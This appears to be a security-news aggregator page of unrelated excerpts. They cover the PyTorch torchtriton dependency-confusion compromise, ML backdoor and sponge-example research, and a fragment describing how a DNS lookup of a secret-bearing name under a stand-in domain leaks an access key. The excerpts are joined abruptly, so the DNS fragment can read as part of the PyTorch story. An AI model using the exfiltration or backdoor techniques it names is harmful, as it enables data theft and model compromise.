Security News
Dec. 31, 2022, the PyTorch machine learning framework announced on its website that one of its packages had been compromised via the PyPI repository. According to the PyTorch team, a malicious torchtriton dependency package was uploaded to the PyPI code repository on Friday, Dec. 30, 2022, at around 4:40 p.m. The malicious package had the same package name as the one shipped on the PyTorch nightly package index.
The maintainers of the PyTorch package have warned users who have installed the nightly builds of the library between December 25, 2022, and December 30, 2022, to uninstall and download the latest versions following a dependency confusion attack. "PyTorch-nightly Linux packages installed via pip during that time installed a dependency, torchtriton, which was compromised on the Python Package Index code repository and ran a malicious binary," the PyTorch team said in an alert over the weekend.
So what looked like an innocent, if pointless, DNS lookup for a "Server" such as S3CR3TPA55W0RD.DODGY.EXAMPLE would quietly leak your access key under the guise of a simple lookup that directed to the official DNS server listed for the DODGY.EXAMPLE domain. LIVE LOG4SHELL DEMO EXPLAINING DATA EXFILTRATION VIA DNS. If you can't read the text clearly here, try using Full Screen mode, or watch directly on YouTube.
An open-source smart data exploration, analysis and model debugging tool for machine learning. Data scientists often need to analyze datasets both during the data preparation stage and model training, which can be overwhelming and time-consuming, especially when working on large-scale datasets.
Abstract: Early backdoor attacks against machine learning set off an arms race in attack and defence development. Defences have since appeared demonstrating some ability to detect backdoors in models or even remove them.
Very few organizations are focusing on protecting their machine learning assets and even fewer are allocating resources to machine learning security. The advantages are proven, but as we've seen with other new technologies, they quickly become a new attack surface for malicious actors.
While such devices enable us to train large-scale neural networks in datacenters and deploy them on edge devices, their designers' focus so far is on average-case performance. We show how adversaries can exploit carefully-crafted sponge examples, which are inputs designed to maximise energy consumption and latency, to drive machine learning systems towards their worst-case performance.
Most deep neural networks are trained by stochastic gradient descent. Now "Stochastic" is a fancy Greek word for "Random"; it means that the training data are fed into the model in random order.
Network traffic continues to increase, and global internet bandwidth grew by 29% in 2021, reaching 786 Tbps. In addition to record traffic volumes, 95% of traffic is now encrypted according to Google. To help address these problems, many network security and operations teams are relying more heavily on machine learning technologies to identify faults, anomalies, and threats in network traffic.
Abstract: Given the computational cost and technical expertise required to train machine learning models, users may delegate the task of learning to a service provider. We show how a malicious learner can plant an undetectable backdoor into a classifier.